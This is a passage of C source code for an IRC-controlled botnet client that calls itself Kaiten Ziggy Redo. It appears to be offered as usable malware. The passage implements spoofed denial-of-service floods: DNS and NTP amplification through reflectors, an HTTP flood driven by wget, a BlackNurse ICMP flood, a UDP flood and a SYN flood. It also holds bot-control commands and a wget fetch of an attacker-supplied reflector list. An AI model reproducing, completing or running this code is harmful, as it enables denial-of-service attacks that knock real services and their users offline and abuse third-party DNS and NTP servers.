  742. else Send(sock, "NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n", sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0]);
  743. }
  744. void version(int sock, char *sender, int argc, char **argv) {
  745. Send(sock, "NOTICE %s :Kaiten Ziggy Redo by Freak version 4.20", sender);
  746. }
  747. void nickc(int sock, char *sender, int argc, char **argv) {
  748. if (argc != 1) {
  749. Send(sock, "NOTICE %s :NICK <nick>\n", sender);
  750. return;
  751. }
  752. if (strlen(argv[1]) >= 10) {
  753. Send(sock, "NOTICE %s :Nick cannot be larger than 9 characters.\n", sender);
  754. return;
  755. }
  756. Send(sock, "NICK %s\n",argv[1]);
  757. }
  758. void disable(int sock, char *sender, int argc, char **argv) {
  759. if (argc != 1) {
  760. Send(sock, "NOTICE %s :DISABLE <pass>\n", sender);
  761. Send(sock, "NOTICE %s :Current status is: %s.\n", sender,disabled?"Disabled":"Enabled and awaiting orders");
  762. return;
  763. }
  764. if (disabled) {
  765. Send(sock, "NOTICE %s :Already disabled.\n", sender);
  766. return;
  767. }
  768. if (strlen(argv[1]) > 254) {
  769. Send(sock, "NOTICE %s :Password too long! > 254\n", sender);
  770. return;
  771. }
  772. disabled=1;
  773. memset(dispass,0,256);
  774. strcpy(dispass,argv[1]);
  775. Send(sock, "NOTICE %s :Disable sucessful.\n");
  776. }
  777. void enable(int sock, char *sender, int argc, char **argv) {
  778. if (argc != 1) {
  779. Send(sock, "NOTICE %s :ENABLE <pass>\n", sender);
  780. Send(sock, "NOTICE %s :Current status is: %s.\n", sender,disabled?"Disabled":"Enabled and awaiting orders");
  781. return;
  782. }
  783. if (!disabled) {
  784. Send(sock, "NOTICE %s :Already enabled.\n", sender);
  785. return;
  786. }
  787. if (strcasecmp(dispass,argv[1])) {
  788. Send(sock, "NOTICE %s :Wrong password\n", sender);
  789. return;
  790. }
  791. disabled=0;
  792. Send(sock, "NOTICE %s :Password correct.\n", sender);
  793. }
  794. void spoof(int sock, char *sender, int argc, char **argv) {
  795. char ip[256];
  796. int i, num;
  797. unsigned long uip;
  798. if (argc != 1) {
  799. Send(sock, "NOTICE %s :Removed all spoofs\n", sender);
  800. spoofs=0;
  801. spoofsm=0;
  802. return;
  803. }
  804. if (strlen(argv[1]) > 16) {
  805. Send(sock, "NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n", sender);
  806. return;
  807. }
  808. strcpy(ip,argv[1]);
  809. if (ip[strlen(ip)-1] == '.') ip[strlen(ip)-1] = 0;
  810. for (i=0, num=1;i<strlen(ip);i++) if (ip[i] == '.') num++;
  811. num=-(num-4);
  812. for (i=0;i<num;i++) strcat(ip,".0");
  813. uip=inet_network(ip);
  814. if (num == 0) spoofsm=1;
  815. else spoofsm=pow(256,num);
  816. spoofs=uip;
  817. }
  818. /*struct iphdr {
  819. unsigned int ihl:4, version:4;
  820. unsigned char tos;
  821. unsigned short tot_len;
  822. unsigned short id;
  823. unsigned short frag_off;
  824. unsigned char ttl;
  825. unsigned char protocol;
  826. unsigned short check;
  827. unsigned long saddr;
  828. unsigned long daddr;
  829. };*/
  830. /*struct udphdr {
  831. unsigned short source;
  832. unsigned short dest;
  833. unsigned short len;
  834. unsigned short check;
  835. };*/
  836. struct tcphdr {
  837. unsigned short source;
  838. unsigned short dest;
  839. unsigned long seq;
  840. unsigned long ack_seq;
  841. unsigned short res1:4, doff:4;
  842. unsigned char fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, ece:1, cwr:1;
  843. unsigned short window;
  844. unsigned short check;
  845. unsigned short urg_ptr;
  846. };
  847. struct send_tcp {
  848. struct iphdr ip;
  849. struct tcphdr tcp;
  850. char buf[20];
  851. };
  852. struct pseudo_header {
  853. unsigned int source_address;
  854. unsigned int dest_address;
  855. unsigned char placeholder;
  856. unsigned char protocol;
  857. unsigned short tcp_length;
  858. struct tcphdr tcp;
  859. char buf[20];
  860. };
  861. unsigned int host2ip(char *sender,char *hostname) {
  862. static struct in_addr i;
  863. struct hostent *h;
  864. if((i.s_addr = inet_addr(hostname)) == -1) {
  865. if((h = gethostbyname(hostname)) == NULL) {
  866. Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname);
  867. exit(0);
  868. }
  869. bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
  870. }
  871. return i.s_addr;
  872. }
  873.  
  874. static uint32_t Q[4096], c = 362436;
  875.  
  876. struct list
  877. {
  878. struct sockaddr_in data;
  879. char domain[512];
  880. int line;
  881. struct list *next;
  882. struct list *prev;
  883. };
  884. struct list *head;
  885.  
  886. struct thread_data{
  887. int thread_id;
  888. struct list *list_node;
  889. struct sockaddr_in sin;
  890. int port;
  891. };
  892.  
  893. struct DNS_HEADER
  894. {
  895. unsigned short id; // identification number
  896.  
  897. unsigned char rd :1; // recursion desired
  898. unsigned char tc :1; // truncated message
  899. unsigned char aa :1; // authoritive answer
  900. unsigned char opcode :4; // purpose of message
  901. unsigned char qr :1; // query/response flag
  902.  
  903. unsigned char rcode :4; // response code
  904. unsigned char cd :1; // checking disabled
  905. unsigned char ad :1; // authenticated data
  906. unsigned char z :1; // its z! reserved
  907. unsigned char ra :1; // recursion available
  908.  
  909. unsigned short q_count; // number of question entries
  910. unsigned short ans_count; // number of answer entries
  911. unsigned short auth_count; // number of authority entries
  912. unsigned short add_count; // number of resource entries
  913. };
  914.  
  915. //Constant sized fields of query structure
  916. struct QUESTION
  917. {
  918. unsigned short qtype;
  919. unsigned short qclass;
  920. };
  921.  
  922. //Constant sized fields of the resource record structure
  923. struct QUERY
  924. {
  925. unsigned char *name;
  926. struct QUESTION *ques;
  927. };
  928.  
  929. void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)
  930. {
  931. int lock = 0 , i;
  932. strcat((char*)host,".");
  933.  
  934. for(i = 0 ; i < strlen((char*)host) ; i++)
  935. {
  936. if(host[i]=='.')
  937. {
  938. *dns++ = i-lock;
  939. for(;lock<i;lock++)
  940. {
  941. *dns++=host[lock];
  942. }
  943. lock++; //or lock=i+1;
  944. }
  945. }
  946. *dns++='\0';
  947. }
  948. void init_rand(uint32_t x)
  949. {
  950. int i;
  951.  
  952. Q[0] = x;
  953. Q[1] = x + PHI;
  954. Q[2] = x + PHI + PHI;
  955.  
  956. for (i = 3; i < 4096; i++)
  957. Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
  958. }
  959.  
  960. uint32_t rand_cmwc(void)
  961. {
  962. uint64_t t, a = 18782LL;
  963. static uint32_t i = 4095;
  964. uint32_t x, r = 0xfffffffe;
  965. i = (i + 1) & 4095;
  966. t = a * Q[i] + c;
  967. c = (t >> 32);
  968. x = t + c;
  969. if (x < c) {
  970. x++;
  971. c++;
  972. }
  973. return (Q[i] = r - x);
  974. }
  975.  
  976. void setup_udp_header(struct udphdr *udph)
  977. {
  978.  
  979. }
  980.  
  981. void *flood(void *par1)
  982. {
  983. struct thread_data *td = (struct thread_data *)par1;
  984.  
  985. fprintf(stdout, "Thread %d started\n", td->thread_id);
  986.  
  987. char strPacket[MAX_PACKET_SIZE];
  988. int iPayloadSize = 0;
  989.  
  990. struct sockaddr_in sin = td->sin;
  991. struct list *list_node = td->list_node;
  992. int iPort = td->port;
  993.  
  994. int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  995. if(s < 0)
  996. {
  997. fprintf(stderr, "Could not open raw socket. You need to be root!\n");
  998. exit(-1);
  999. }
  1000.  
  1001. //init random
  1002. init_rand(time(NULL));
  1003.  
  1004. // Clear the data
  1005. memset(strPacket, 0, MAX_PACKET_SIZE);
  1006.  
  1007. // Make the packet
  1008. struct iphdr *iph = (struct iphdr *) &strPacket;
  1009. iph->ihl = 5;
  1010. iph->version = 4;
  1011. iph->tos = 0;
  1012. iph->tot_len = sizeof(struct iphdr) + 38;
  1013. iph->id = htonl(54321);
  1014. iph->frag_off = 0;
  1015. iph->ttl = MAXTTL;
  1016. iph->protocol = IPPROTO_UDP;
  1017. iph->check = 0;
  1018. iph->saddr = inet_addr("192.168.3.100");
  1019.  
  1020. iPayloadSize += sizeof(struct iphdr);
  1021.  
  1022.  
  1023. struct udphdr *udph = (struct udphdr *) &strPacket[iPayloadSize];
  1024. udph->source = htons(iPort);
  1025. udph->dest = htons(53);
  1026. udph->check = 0;
  1027.  
  1028. iPayloadSize += sizeof(struct udphdr);
  1029.  
  1030. struct DNS_HEADER *dns = (struct DNS_HEADER *) &strPacket[iPayloadSize];
  1031. dns->id = (unsigned short) htons(rand_cmwc());
  1032. dns->qr = 0; //This is a query
  1033. dns->opcode = 0; //This is a standard query
  1034. dns->aa = 0; //Not Authoritative
  1035. dns->tc = 0; //This message is not truncated
  1036. dns->rd = 1; //Recursion Desired
  1037. dns->ra = 0; //Recursion not available! hey we dont have it
  1038. dns->z = 0;
  1039. dns->ad = 0;
  1040. dns->cd = 0;
  1041. dns->rcode = 0;
  1042. dns->q_count = htons(1); //we have only 1 question
  1043. dns->ans_count = 0;
  1044. dns->auth_count = 0;
  1045. dns->add_count = htons(1);
  1046.  
  1047. iPayloadSize += sizeof(struct DNS_HEADER);
  1048.  
  1049. sin.sin_port = udph->source;
  1050. iph->saddr = sin.sin_addr.s_addr;
  1051. iph->daddr = list_node->data.sin_addr.s_addr;
  1052. iph->check = ccsum ((unsigned short *) strPacket, iph->tot_len >> 1);
  1053.  
  1054.  
  1055. char strDomain[512];
  1056. int i;
  1057. int j = 0;
  1058. int iAdditionalSize = 0;
  1059. while(1)
  1060. {
  1061. if(j==2){
  1062. usleep(100);
  1063. j=0;
  1064. }
  1065.  
  1066.  
  1067.  
  1068. //set the next node
  1069. list_node = list_node->next;
  1070.  
  1071. //Clear the old domain and question
  1072. memset(&strPacket[iPayloadSize + iAdditionalSize], 0, iAdditionalSize+256);
  1073.  
  1074. //add the chosen domain and question
  1075. iAdditionalSize = 0;
  1076.  
  1077. unsigned char *qname = (unsigned char*) &strPacket[iPayloadSize + iAdditionalSize];
  1078.  
  1079. strcpy(strDomain, list_node->domain);
  1080. ChangetoDnsNameFormat(qname, strDomain);
  1081. //printf("!!%s %d\n", list_node->domain, list_node->line);
  1082.  
  1083. iAdditionalSize += strlen(qname) + 1;
  1084.  
  1085. struct QUESTION *qinfo = (struct QUESTION *) &strPacket[iPayloadSize + iAdditionalSize];
  1086. qinfo->qtype = htons(255); //type of the query , A , MX , CNAME , NS etc
  1087. qinfo->qclass = htons(1);
  1088.  
  1089. iAdditionalSize += sizeof(struct QUESTION);
  1090.  
  1091. strPacket[iPayloadSize + iAdditionalSize] = 0x00;
  1092. strPacket[iPayloadSize + iAdditionalSize + 1] = 0x00;
  1093. strPacket[iPayloadSize + iAdditionalSize + 2] = 0x29;
  1094. strPacket[iPayloadSize + iAdditionalSize + 3] = 0x23;
  1095. strPacket[iPayloadSize + iAdditionalSize + 4] = 0x28;
  1096. strPacket[iPayloadSize + iAdditionalSize + 5] = 0x00;
  1097. strPacket[iPayloadSize + iAdditionalSize + 6] = 0x00;
  1098. strPacket[iPayloadSize + iAdditionalSize + 7] = 0x00;
  1099. strPacket[iPayloadSize + iAdditionalSize + 8] = 0x00;
  1100. strPacket[iPayloadSize + iAdditionalSize + 9] = 0x00;
  1101. strPacket[iPayloadSize + iAdditionalSize + 10] = 0x00;
  1102. strPacket[iPayloadSize + iAdditionalSize + 11] = 0x00;
  1103.  
  1104. iAdditionalSize += 11;
  1105.  
  1106.  
  1107. //set new node data
  1108. iph->daddr = list_node->data.sin_addr.s_addr;
  1109.  
  1110. udph->len= htons((iPayloadSize + iAdditionalSize) - sizeof(struct iphdr));
  1111. iph->tot_len = iPayloadSize + iAdditionalSize;
  1112.  
  1113. udph->source = htons(rand_cmwc() & 0xFFFF);
  1114. iph->check = ccsum ((unsigned short *) strPacket, iph->tot_len >> 1);
  1115.  
  1116. //send
  1117. for(i = 0; i < PACKETS_PER_RESOLVER; i++)
  1118. {
  1119. sendto(s, strPacket, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
  1120. }
  1121.  
  1122. j++;
  1123. }
  1124. }
  1125.  
  1126. void ParseResolverLine(char *strLine, int iLine)
  1127. {
  1128. char caIP[32] = "";
  1129. char caDNS[512] = "";
  1130.  
  1131. int i;
  1132. char buffer[512] = "";
  1133.  
  1134. int moved = 0;
  1135.  
  1136. for(i = 0; i < strlen(strLine); i++)
  1137. {
  1138. if(strLine[i] == ' ' || strLine[i] == '\n' || strLine[i] == '\t')
  1139. {
  1140. moved++;
  1141. continue;
  1142. }
  1143.  
  1144. if(moved == 0)
  1145. {
  1146. caIP[strlen(caIP)] = (char) strLine[i];
  1147. }
  1148. else if(moved == 1)
  1149. {
  1150. caDNS[strlen(caDNS)] = (char) strLine[i];
  1151. }
  1152. }
  1153.  
  1154. //printf("Found resolver %s, domain %s!\n", caIP, caDNS);
  1155.  
  1156. if(head == NULL)
  1157. {
  1158. head = (struct list *)malloc(sizeof(struct list));
  1159.  
  1160. bzero(&head->data, sizeof(head->data));
  1161.  
  1162. head->data.sin_addr.s_addr=inet_addr(caIP);
  1163. head->data.sin_port=htons(53);
  1164. strcpy(head->domain, caDNS);
  1165. head->line = iLine;
  1166. head->next = head;
  1167. head->prev = head;
  1168. }
  1169. else
  1170. {
  1171. struct list *new_node = (struct list *)malloc(sizeof(struct list));
  1172.  
  1173. memset(new_node, 0x00, sizeof(struct list));
  1174.  
  1175. new_node->data.sin_addr.s_addr=inet_addr(caIP);
  1176. new_node->data.sin_port=htons(53);
  1177. strcpy(new_node->domain, caDNS);
  1178. new_node->prev = head;
  1179. head->line = iLine;
  1180. new_node->next = head->next;
  1181. head->next = new_node;
  1182. }
  1183. }
  1184.  
  1185. void dnsamp(int sockfd, char *sender, int argc, char **argv)
  1186. {
  1187. if (mfork(sender) != 0) return;
  1188. if(argc < 4)
  1189. {
  1190. Send(sock, "NOTICE %s :DNSAMP <IP> <port> <reflection file url> <threads> <time>\n", sender);
  1191. exit(-1);
  1192. }
  1193. char *command[128];
  1194.  
  1195. sprintf(command,"wget \"");
  1196. strcat(command, argv[3]);
  1197. strcat(command,"\" -q -O DNS.txt");
  1198.  
  1199. system(command);
  1200.  
  1201. head = NULL;
  1202.  
  1203. char *strLine = (char *) malloc(256);
  1204. strLine = memset(strLine, 0x00, 256);
  1205.  
  1206. char strIP[32] = "";
  1207. char strDomain[256] = "";
  1208.  
  1209. int iLine = 0; // 0 = ip, 1 = domain.
  1210.  
  1211. FILE *list_fd = fopen("DNS.txt", "r");
  1212. while(fgets(strLine, 256, list_fd) != NULL)
  1213. {
  1214. ParseResolverLine(strLine, iLine);
  1215. iLine++;
  1216. }
  1217.  
  1218.  
  1219. int i = 0;
  1220. int num_threads = atoi(argv[4]);
  1221.  
  1222. struct list *current = head->next;
  1223. pthread_t thread[num_threads];
  1224. struct sockaddr_in sin;
  1225. sin.sin_family = AF_INET;
  1226. sin.sin_port = htons(0);
  1227. sin.sin_addr.s_addr = inet_addr(argv[1]);
  1228. struct thread_data td[num_threads];
  1229.  
  1230. int iPort = atoi(argv[2]);
  1231.  
  1232. printf("Target: %s:%d\n", argv[1], iPort);
  1233.  
  1234. for(i = 0; i < num_threads; i++)
  1235. {
  1236. td[i].thread_id = i;
  1237. td[i].sin= sin;
  1238. td[i].list_node = current;
  1239. td[i].port = iPort;
  1240. pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
  1241. }
  1242.  
  1243. Send(sock, "NOTICE %s :DNS amp attacking %s\n", sender,argv[1]);
  1244.  
  1245. fprintf(stdout, "Starting Flood... Nigga!!\n");
  1246.  
  1247. if(argc > 4)
  1248. {
  1249. sleep(atoi(argv[5]));
  1250. }
  1251. else
  1252. {
  1253. while(1)
  1254. {
  1255. sleep(1);
  1256. }
  1257. }
  1258.  
  1259. exit(1);
  1260. }
  1261.  
  1262. void sendHTTP(int sock, char *sender, int argc, char **argv) {
  1263. unsigned char *url;
  1264. int end_time;
  1265. if (mfork(sender) != 0) return;
  1266. if (argc < 2) {
  1267. Send(sock, "NOTICE %s :HTTPFLOOD <url> <secs>\n", sender);
  1268. exit(1);
  1269. }
  1270.  
  1271. url = argv[1];
  1272. end_time = atoi(argv[2]);
  1273.  
  1274. int end = time(NULL) + end_time;
  1275. char *UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
  1276. char *command[128];
  1277.  
  1278. Send(sock, "NOTICE %s :HTTP Flooding %s\n", sender, url);
  1279.  
  1280.  
  1281. while(end > time(NULL))
  1282. {
  1283. UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
  1284. sprintf(command,"wget -U \"");
  1285. strcat(command, UA);
  1286. strcat(command,"\" -q ");
  1287. strcat(command, url);
  1288. strcat(command, " -O /dev/null &");
  1289. system(command);
  1290. }
  1291. exit(1);
  1292. }
  1293.  
  1294.  
  1295.  
  1296. //Struct for UDP Packet
  1297. struct udpheader{
  1298. unsigned short int udp_sourcePortNumber;
  1299. unsigned short int udp_destinationPortNumber;
  1300. unsigned short int udp_length;
  1301. unsigned short int udp_checksum;
  1302. };
  1303.  
  1304. // Struct for NTP Request packet. Same as req_pkt from ntpdc.h, just a little simpler
  1305. struct ntpreqheader {
  1306. unsigned char rm_vn_mode; /* response, more, version, mode */
  1307. unsigned char auth_seq; /* key, sequence number */
  1308. unsigned char implementation; /* implementation number */
  1309. unsigned char request; /* request number */
  1310. unsigned short err_nitems; /* error code/number of data items */
  1311. unsigned short mbz_itemsize; /* item size */
  1312. char data[40]; /* data area [32 prev](176 byte max) */
  1313. unsigned long tstamp; /* time stamp, for authentication */
  1314. unsigned int keyid; /* encryption key */
  1315. char mac[8]; /* (optional) 8 byte auth code */
  1316. };
  1317.  
  1318. void ntp(int sock, char *sender, int argc, char **argv) {
  1319. unsigned long secs;
  1320. int i,get;
  1321. if (mfork(sender) != 0) return;
  1322. time_t start=time(NULL);
  1323. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  1324. if (argc < 3) {
  1325. Send(sock, "NOTICE %s :NTP <target> <ntp server> <secs>\n", sender);
  1326. exit(1);
  1327. }
  1328. secs = atol(argv[3]);
  1329.  
  1330.  
  1331. int status; // Maintains the return values of the functions
  1332. struct iphdr *ip; // Pointer to ip header struct
  1333. struct udpheader *udp; // Pointer to udp header struct
  1334. struct ntpreqheader *ntp; // Pointer to ntp request header struct
  1335. int sockfd; // Maintains the socket file descriptor
  1336. int one = 1; // Sets the option IP_HDRINCL of the sockt to tell the kernel that the header are alredy included on the packets.
  1337. struct sockaddr_in dest; // Maintains the data of the destination address
  1338. char packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ]; //Packet itself
  1339.  
  1340. // Parameters check
  1341. if( argc != 3){
  1342. exit(1);
  1343. }
  1344.  
  1345. // Create a socket and tells the kernel that we want to use udp as layer 4 protocol
  1346. sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
  1347. if (sockfd == -1){
  1348. printf("Error on initializing the socket\n");
  1349. exit(1);
  1350. }
  1351.  
  1352.  
  1353.  
  1354. //Sets the option IP_HDRINCL
  1355. status = setsockopt( sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one);
  1356. if (status == -1){
  1357. printf("Error on setting the option HDRINCL on socket\n");
  1358. exit(1);
  1359. }
  1360.  
  1361.  
  1362. //"Zeroes" all the packet stack
  1363. memset( packet, 0, sizeof(packet) );
  1364.  
  1365.  
  1366. //Mounts the packet headers
  1367. // [ [IP HEADER] [UDP HEADER] [NTP HEADER] ] --> Victory!!!
  1368. ip = (struct iphdr *)packet;
  1369. udp = (struct udpheader *) (packet + sizeof(struct iphdr) );
  1370. ntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) );
  1371.  
  1372.  
  1373. //Fill the IP Header
  1374. ip->version = 4; //IPv4
  1375. ip->ihl = 5; //Size of the Ip header, minimum 5
  1376. ip->tos = 0; //Type of service, the default value is 0
  1377. ip->tot_len = sizeof(packet); //Size of the datagram
  1378. ip->id = htons(1234); //LengthIdentification Number
  1379. ip->frag_off = 0; //Flags, zero represents reserved
  1380. ip->ttl = 255; //Time to Live. Maximum of 255
  1381. ip->protocol = IPPROTO_UDP; //Sets the UDP as the next layer protocol
  1382. ip->check = 0; //Checksum.
  1383. ip->saddr = inet_addr( argv[1] ); //Source ip ( spoofing goes here)
  1384.  
  1385. //Fills the UDP Header
  1386. udp->udp_sourcePortNumber = htons( atoi( "123" ) ); //Source Port
  1387. udp->udp_destinationPortNumber = htons(atoi("123")) ; //Destination Port
  1388. udp->udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) ); //Length of the packet
  1389. udp->udp_checksum = 0; //Checksum
  1390.  
  1391. //Calculate the checksums
  1392. //ip->check = ((unsigned short *)packet, ip->tot_len); //Calculate the checksum for iP header
  1393.  
  1394. //Sets the destination data
  1395. dest.sin_family = AF_INET; // Address Family Ipv4
  1396. dest.sin_port = htons (atoi( "123" ) ) ; // Destination port
  1397.  
  1398. //Fills the NTP header
  1399. //Ok, here is the magic, we need to send a request ntp packet with the modes and codes sets for only MON_GETLIST
  1400. //To do this we can import the ntp_types.h and use its structures and macros. To simplify i've created a simple version of the
  1401. // ntp request packet and hardcoded the values for the fields to make a "MON_GETLIST" request packet.
  1402. // To learn more, read this: http://searchcode.com/codesearch/view/451164#127
  1403. ntp->rm_vn_mode=0x17; //Sets the response bit to 0, More bit to 0, Version field to 2, Mode field to 7
  1404. ntp->implementation=0x03; //Sets the implementation to 3
  1405. ntp->request=0x2a; //Sets the request field to 42 ( MON_GETLIST )
  1406. //All the other fields of the struct are zeroed
  1407. ip->daddr = inet_addr( argv[2] ); //Destination IP
  1408. dest.sin_addr.s_addr = inet_addr( argv[2] ); // Destination Endere├žo para onde se quer enviar o pacote
  1409. Send(sock, "NOTICE %s :NTP amp attacking %s\n", sender, argv[1]);
  1410.  
  1411. for (;;) {
  1412. status = sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(dest) );
  1413. if(status <0){
  1414. printf("Failed to send the packets\n");
  1415. exit(1);
  1416. }
  1417.  
  1418. if (i >= 50) {
  1419. if (time(NULL) >= start+secs) {
  1420. exit(0);
  1421. }
  1422. i=0;
  1423. }
  1424. i++;
  1425. }
  1426.  
  1427.  
  1428. }
  1429.  
  1430. void blacknurse(int sock, char *sender, int argc, char *argv[])
  1431. {
  1432. uint8_t pkt_template[] = {
  1433. 0x03, 0x03, 0x0d, 0x33, 0x00, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x1c, 0x4a, 0x04, 0x00, 0x00,
  1434. 0x40, 0x06, 0x20, 0xc5, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x00, 0x00, 0x00, 0x00,
  1435. 0x00, 0x08, 0xef, 0xc1
  1436. };
  1437. uint8_t *pkt;
  1438. struct addrinfo *ai, hints;
  1439. const char *host;
  1440. struct pollfd pfd;
  1441. const size_t pkt_len = (sizeof pkt_template) / (sizeof pkt_template[0]);
  1442. size_t i;
  1443. int gai_err;
  1444. int kindy;
  1445. int x, secs,get;
  1446.  
  1447. time_t start=time(NULL);
  1448. if (mfork(sender) != 0) return;
  1449. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  1450.  
  1451. if (argc < 2) {
  1452. Send(sock, "NOTICE %s :BLACKNURSE <target ip> <secs>", sender);
  1453. exit(1);
  1454. }
  1455.  
  1456. host = argv[1];
  1457. secs = argv[2];
  1458.  
  1459. memset(&hints, 0, sizeof hints);
  1460. hints.ai_family = AF_INET;
  1461. if ((gai_err = getaddrinfo(host, NULL, &hints, &ai)) != 0) {
  1462. fprintf(stderr, "Unable to use [%s]: %s\n", host,
  1463. gai_strerror(gai_err));
  1464. exit(1);
  1465. }
  1466. if ((kindy = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) {
  1467. perror("socket");
  1468. exit(1);
  1469. }
  1470. Send(sock, "NOTICE %s :Blacknursing %s", sender, host);
  1471. pkt = pkt_template;
  1472. pfd.fd = kindy;
  1473. pfd.events = POLLOUT;
  1474. for (;;) {
  1475. for (i = 20; i < 20 + 8 + 4; i++) {
  1476. pkt[i] = (uint8_t) rand();
  1477. }
  1478. if (sendto(kindy, pkt, pkt_len, 0,
  1479. ai->ai_addr, ai->ai_addrlen) != (ssize_t) pkt_len) {
  1480. if (errno == ENOBUFS) {
  1481. poll(&pfd, 1, 1000);
  1482. continue;
  1483. }
  1484. perror("sendto");
  1485. break;
  1486. }
  1487. if (i >= 50) {
  1488. if (time(NULL) >= start+secs) exit(0);
  1489. x=0;
  1490. }
  1491. x++;
  1492. }
  1493. /* NOTREACHED */
  1494. close(kindy);
  1495. freeaddrinfo(ai);
  1496.  
  1497. return;
  1498. }
  1499.  
  1500. void udp(int sock, char *sender, int argc, char **argv) {
  1501. unsigned int port,i=0;
  1502. unsigned long psize,target,secs;
  1503. struct sockaddr_in s_in;
  1504. struct iphdr *ip;
  1505. struct udphdr *udp;
  1506. char buf[1500],*str;
  1507. int get;
  1508. time_t start=time(NULL);
  1509. if (mfork(sender) != 0) return;
  1510. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  1511. if (argc < 3) {
  1512. Send(sock, "NOTICE %s :UDP <target> <port> <secs>\n", sender);
  1513. exit(1);
  1514. }
  1515. target = host2ip(sender,argv[1]);
  1516. port = atoi(argv[2]);
  1517. secs = atol(argv[3]);
  1518. ip=(void*)buf;
  1519. udp=(void*)(buf+sizeof(struct iphdr));
  1520. str=(void*)(buf+sizeof(struct iphdr)+sizeof(struct udphdr));
  1521. memset(str,10,1500-(sizeof(struct iphdr)+sizeof(struct udphdr)));
  1522. Send(sock, "NOTICE %s :Packeting %s.\n", sender,argv[1]);
  1523. ip->ihl = 5;
  1524. ip->version = 4;
  1525. ip->tos = 0;
  1526. ip->tot_len = 1500;
  1527. ip->frag_off = 0;
  1528. ip->protocol = 17;
  1529. ip->ttl = 64;
  1530. ip->daddr = target;
  1531. udp->len = htons(psize);
  1532. s_in.sin_family = AF_INET;
  1533. s_in.sin_addr.s_addr = target;
  1534. for (;;) {
  1535. udp->source = rand();
  1536. if (port) udp->dest = htons(port);
  1537. else udp->dest = rand();
  1538. udp->check = in_cksum((u_short *)buf,1500);
  1539. ip->saddr = getspoof();
  1540. ip->id = rand();
  1541. ip->check = in_cksum((u_short *)buf,1500);
  1542. s_in.sin_port = udp->dest;
  1543. sendto(get,buf,1500,0,(struct sockaddr *)&s_in,sizeof(s_in));
  1544. if (i >= 50) {
  1545. if (time(NULL) >= start+secs) exit(0);
  1546. i=0;
  1547. }
  1548. i++;
  1549. }
  1550. }
  1551. void pan(int sock, char *sender, int argc, char **argv) {
  1552. struct send_tcp send_tcp;
  1553. struct pseudo_header pseudo_header;
  1554. struct sockaddr_in sin;
  1555. unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
  1556. unsigned int psize=20, source, dest, check;
  1557. unsigned long saddr, daddr,secs;
  1558. int get;
  1559. time_t start=time(NULL);
  1560. if (mfork(sender) != 0) return;
  1561. if (argc < 3) {
  1562. Send(sock, "NOTICE %s :PAN <target> <port> <secs>\n", sender);
  1563. exit(1);
  1564. }
  1565. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  1566. {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
  1567. daddr=host2ip(sender,argv[1]);
  1568. secs=atol(argv[3]);
  1569. Send(sock, "NOTICE %s :Panning %s.\n", sender,argv[1]);
  1570. send_tcp.ip.ihl = 5;
  1571. send_tcp.ip.version = 4;
  1572. send_tcp.ip.tos = 16;
  1573. send_tcp.ip.frag_off = 64;
  1574. send_tcp.ip.ttl = 64;
  1575. send_tcp.ip.protocol = 6;
  1576. send_tcp.tcp.ack_seq = 0;
  1577. send_tcp.tcp.doff = 10;
  1578. send_tcp.tcp.res1 = 0;
  1579. send_tcp.tcp.cwr = 0;
  1580. send_tcp.tcp.ece = 0;
  1581. send_tcp.tcp.urg = 0;
  1582. send_tcp.tcp.ack = 0;
  1583. send_tcp.tcp.psh = 0;
  1584. send_tcp.tcp.rst = 0;
  1585. send_tcp.tcp.fin = 0;
  1586. send_tcp.tcp.syn = 1;
  1587. send_tcp.tcp.window = 30845;
  1588. send_tcp.tcp.urg_ptr = 0;
  1589. dest=htons(atoi(argv[2]));
  1590. while(1) {
  1591. source=rand();
  1592. if (atoi(argv[2]) == 0) dest=rand();
  1593. saddr=getspoof();
  1594. send_tcp.ip.tot_len = htons(40+psize);
  1595. send_tcp.ip.id = rand();
  1596. send_tcp.ip.saddr = saddr;
  1597. send_tcp.ip.daddr = daddr;
  1598. send_tcp.ip.check = 0;
  1599. send_tcp.tcp.source = source;
  1600. send_tcp.tcp.dest = dest;
  1601. send_tcp.tcp.seq = rand();
  1602. send_tcp.tcp.check = 0;
  1603. sin.sin_family = AF_INET;
  1604. sin.sin_port = dest;
  1605. sin.sin_addr.s_addr = send_tcp.ip.daddr;
  1606. send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
  1607. check = rand();
  1608. send_tcp.buf[9]=((char*)&check)[0];
  1609. send_tcp.buf[10]=((char*)&check)[1];
  1610. send_tcp.buf[11]=((char*)&check)[2];
  1611. send_tcp.buf[12]=((char*)&check)[3];
  1612. pseudo_header.source_address = send_tcp.ip.saddr;
